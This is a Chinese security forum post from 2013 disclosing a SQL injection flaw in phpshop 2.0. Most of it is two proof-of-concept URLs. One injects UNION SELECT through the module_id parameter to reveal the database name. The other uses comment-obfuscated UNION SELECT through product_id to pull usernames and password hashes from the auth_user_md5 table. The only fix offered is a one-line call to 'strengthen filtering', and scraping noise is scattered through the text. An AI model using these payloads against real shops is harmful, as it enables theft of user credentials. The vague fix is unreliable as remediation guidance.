找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability$ |" M8 c6 P8 L+ _- U  C  S
$ w( X. j" y/ B: I% o
作者 : By onestree
5 O8 A! y/ K  k" w. N6 w下载地址 : http://code.google.com/p/phpshop/downloads/list
# f0 v2 ]2 c7 D- j) u5 p1 T( w' A测试地址: windows 7 / ubuntu
8 r4 [- @; ]' h4 @- ?. k, ^
5 m. C# C3 z3 q. {0 e * z: R, v) ?) \9 J# `" @( G* E
SQLi p0c:( f- e& X* g# D7 J( k$ d, A& [

( \) f1 e3 u4 m==================. ~3 T- \/ d5 _5 u
4 r2 d+ C9 K! X# M
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
# e" p  i+ z; f+ u3 ]/ [% ^union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --: E& A. }1 T6 W4 K
/ V  r; u, J- P3 |$ G
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--% n/ E2 h" O6 ?9 L

6 _6 _" h; L' P: t修复:6 Q1 D3 Y5 S7 r/ {* i
加强过滤
; F, E5 q# z- y​
2 d: ?' O7 s( \( M$ G5 @3 \5 j
5 t; W/ `; h, J: ~+ S0 O; |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表